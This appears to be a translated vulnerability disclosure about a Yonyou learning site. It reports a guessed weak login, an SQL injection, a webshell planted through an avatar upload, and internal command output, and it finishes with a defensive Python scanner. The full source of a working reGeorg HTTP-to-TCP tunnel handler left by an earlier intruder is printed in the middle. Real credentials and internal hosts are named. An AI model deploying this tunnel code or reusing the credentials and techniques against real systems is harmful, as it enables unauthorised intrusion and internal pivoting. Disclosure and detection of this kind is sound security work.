From a weak password to getshell on a Yonyou site (can pivot into the internal network; traces of a prior intruder found)

1. One site has no CAPTCHA on its login: after a little guessing I obtained an account on http://lexue.yonyou.com, test1/123456


2. An SQL injection point: after logging in, a quick look over the site turned up an error-based injection:


I did not test further; there are probably more injection points. Please check for yourselves!

3. Arbitrary file upload via the profile avatar


Testing showed that uploading an ordinary Caidao (China Chopper) shell throws errors; the aspx is not parsed properly.

After uploading, the full upload path can be read from the captured response:


The server turned out to be connected to the internal network:

[*] 基本信息 [ A:\C:\D:\L:\ ]

D:\PX20150204\Website\Upload\PXSystem\default> whoami
nt authority\network service

D:\PX20150204\Website\UpLoad\PXSystem\default> nslookup yonyou.com
服务器:  bg-dc-01.ufsoft.com.cn
Address:  192.168.8.119

名称:    yonyou.com.com.cn
Address:  202.106.199.34

4. Traces of an earlier intrusion: in the same directory there is a file named 20151002173504600358.aspx


The intrusion can be dated to 2 October of last year. A privilege-escalation tool was also found:


Searching the directories turned up D:\PX20150204\Website\Upload\Log\tunnel.ashx:

using System;
using System.Web;
using System.Net;
using System.Net.Sockets;

// reGeorg-style HTTP tunnel handler: each POST carries a ?cmd= parameter, and the
// TCP socket it operates on is kept in the ASP.NET session between requests.
public class GenericHandler1 : IHttpHandler, System.Web.SessionState.IRequiresSessionState
{
    public void ProcessRequest (HttpContext context) {
        try
        {
            if (context.Request.HttpMethod == "POST")
            {
                String cmd = context.Request.QueryString.Get("cmd").ToUpper();
                if (cmd == "CONNECT")
                {
                    // Opens a TCP connection to target:port and stores it in the session.
                    try
                    {
                        String target = context.Request.QueryString.Get("target").ToUpper();
                        int port = int.Parse(context.Request.QueryString.Get("port"));
                        IPAddress ip = IPAddress.Parse(target);
                        System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);
                        Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        sender.Connect(remoteEP);
                        sender.Blocking = false;
                        context.Session["socket"] = sender;
                        context.Response.AddHeader("X-STATUS", "OK");
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
                else if (cmd == "DISCONNECT")
                {
                    // Closes the stored socket and abandons the session.
                    try
                    {
                        Socket s = (Socket)context.Session["socket"];
                        s.Close();
                    }
                    catch (Exception ex)
                    {
                    }
                    context.Session.Abandon();
                    context.Response.AddHeader("X-STATUS", "OK");
                }
                else if (cmd == "FORWARD")
                {
                    // Relays the POST body to the stored socket.
                    Socket s = (Socket)context.Session["socket"];
                    try
                    {
                        int buffLen = context.Request.ContentLength;
                        byte[] buff = new byte[buffLen];
                        int c = 0;
                        while ((c = context.Request.InputStream.Read(buff, 0, buff.Length)) > 0)
                        {
                            s.Send(buff);
                        }
                        context.Response.AddHeader("X-STATUS", "OK");
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
                else if (cmd == "READ")
                {
                    // Drains whatever the socket has received into the HTTP response.
                    Socket s = (Socket)context.Session["socket"];
                    try
                    {
                        int c = 0;
                        byte[] readBuff = new byte[512];
                        try
                        {
                            while ((c = s.Receive(readBuff)) > 0)
                            {
                                byte[] newBuff = new byte[c];
                                Array.ConstrainedCopy(readBuff, 0, newBuff, 0, c);
                                context.Response.BinaryWrite(newBuff);
                            }
                            context.Response.AddHeader("X-STATUS", "OK");
                        }
                        catch (SocketException soex)
                        {
                            context.Response.AddHeader("X-STATUS", "OK");
                            return;
                        }
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
            } else {
                // Plain GET: the reGeorg banner, handy as a detection string.
                context.Response.Write("Georg says, 'All seems fine'");
            }
        }
        catch (Exception exKak)
        {
            context.Response.AddHeader("X-ERROR", exKak.Message);
            context.Response.AddHeader("X-STATUS", "FAIL");
        }
    }

    public bool IsReusable {
        get {
            return false;
        }
    }
}

Going by the timestamps, this file was created on 27 October of last year. The intruder probably uploaded it and hid it in the Log directory to tunnel back into the internal network, from where deeper intranet penetration would be possible. Since I had no permission from the vendor, I did not go any further!
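A defender-side check for the kind of trace described above, added here as an example and not part of the original report: it walks a webroot, flags any .ashx/.aspx/.asmx handler that carries the reGeorg markers seen in tunnel.ashx or that sits under an upload or log directory at all, and records each file's modification time so the timeline can be built as the report does. The directory names, the three-indicator threshold and the build_demo_tree sample tree are assumptions made for the demonstration.

```python
import os
import tempfile
from datetime import datetime
# Indicator strings taken from the tunnel.ashx found on the server above:
# together they characterise a reGeorg-style HTTP-to-TCP tunnel handler.
TUNNEL_INDICATORS = {
    "socket_api": "System.Net.Sockets", "http_handler": "IHttpHandler",
    "cmd_connect": '"CONNECT"', "cmd_forward": '"FORWARD"', "cmd_read": '"READ"',
    "status_header": "X-STATUS", "georg_banner": "Georg says",
}
# No server-side handler should live under an upload directory
# (assumption: names taken from the Upload\Log path in the report).
UPLOAD_DIR_NAMES = {"upload", "uploads", "log"}
HANDLER_EXTS = (".ashx", ".aspx", ".asmx")

def score_source(text):
    """Return the indicator names present in one handler's source text."""
    return [name for name, needle in TUNNEL_INDICATORS.items() if needle in text]

def scan_webroot(root):
    """Flag handlers with >= 3 tunnel indicators, or any handler under an upload directory."""
    findings = []
    for dirpath, _, files in os.walk(root):
        parts = {p.lower() for p in os.path.normpath(dirpath).split(os.sep)}
        in_upload = bool(parts & UPLOAD_DIR_NAMES)
        for fn in files:
            if not fn.lower().endswith(HANDLER_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="ignore") as f:
                hits = score_source(f.read())
            if len(hits) >= 3 or in_upload:
                st = os.stat(path)  # file times give the timeline, as the report does
                findings.append({"path": path, "indicators": hits, "under_upload_dir": in_upload,
                                 "modified": datetime.fromtimestamp(st.st_mtime).isoformat(timespec="seconds")})
    return findings

def build_demo_tree():
    """Write a constructed sample webroot (not the real server) and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    log_dir = os.path.join(root, "Upload", "Log")
    os.makedirs(log_dir)
    with open(os.path.join(log_dir, "tunnel.ashx"), "w") as f:  # stub carrying the markers above
        f.write('using System.Net.Sockets;\nclass G : IHttpHandler {\n"CONNECT" "FORWARD" "READ"\n'
                '"X-STATUS"\n"Georg says, \'All seems fine\'"\n}\n')
    with open(os.path.join(root, "Default.ashx"), "w") as f:  # benign handler at the webroot
        f.write("class Health : IHttpHandler { }\n")
    return root
```

Run `scan_webroot(r"D:\PX20150204\Website")` on the real host to list suspects; on Windows, `os.stat(...).st_ctime` additionally gives the creation time the report relied on.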